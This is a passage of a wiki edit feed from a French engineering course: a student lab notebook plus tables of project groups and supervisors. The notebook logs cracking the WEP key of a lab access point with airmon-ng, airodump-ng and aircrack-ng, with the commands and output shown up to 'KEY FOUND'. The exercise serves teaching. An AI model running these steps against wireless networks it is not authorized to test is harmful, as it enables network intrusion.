/&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Travail réalisé la 1ère semaine ===&lt;br /&gt;
&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&lt;br /&gt;
===Travail réalisé la 2ème semaine ===&lt;br /&gt;
&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&lt;br /&gt;
===Travail réalisé la 3ème semaine ===&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
===Travail réalisé la 4ème semaine ===&lt;br /&gt;
&lt;br /&gt;
Cette semaine, nous avons continué de configurer la machine virtuelle, et nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=TP_sysres_IMA5sc_2016/2017&amp;diff=33852</id>
		<title>TP sysres IMA5sc 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=TP_sysres_IMA5sc_2016/2017&amp;diff=33852"/>
				<updated>2016-10-03T14:57:52Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Cahier&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Tâche particulière&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°1]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Bonding Linux&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°2]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX &amp;amp; Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cablâge &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°3]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; DAS + Serveur Sauvegarde &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°4]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; LACP&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°5]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  ROJ Thomas - MAIA Stéphane &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 4331 Routage &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°6]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; SZWECHOWIEZ Maxime &amp;amp; LENTIEUL Romuald &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 3560E Routage&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°7]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 6006 Commutateur &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°8]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; 6006 Commutateur &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°9]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration Wifi &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Cahier 2016 groupe n°10]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Configuration Wifi &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33812</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33812"/>
				<updated>2016-10-02T12:31:02Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Matériel nécessaires */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P56 Robot testeur de club de golf]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Joshua LETELLIER &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rochdi MERZOUKI (Ecole) / Guillaume DEWAELE (Entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P61 Jeux d'aventure grandeur nature ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; MAIA Stéphane / LENTIEUL Romuald &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; GAPAS / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
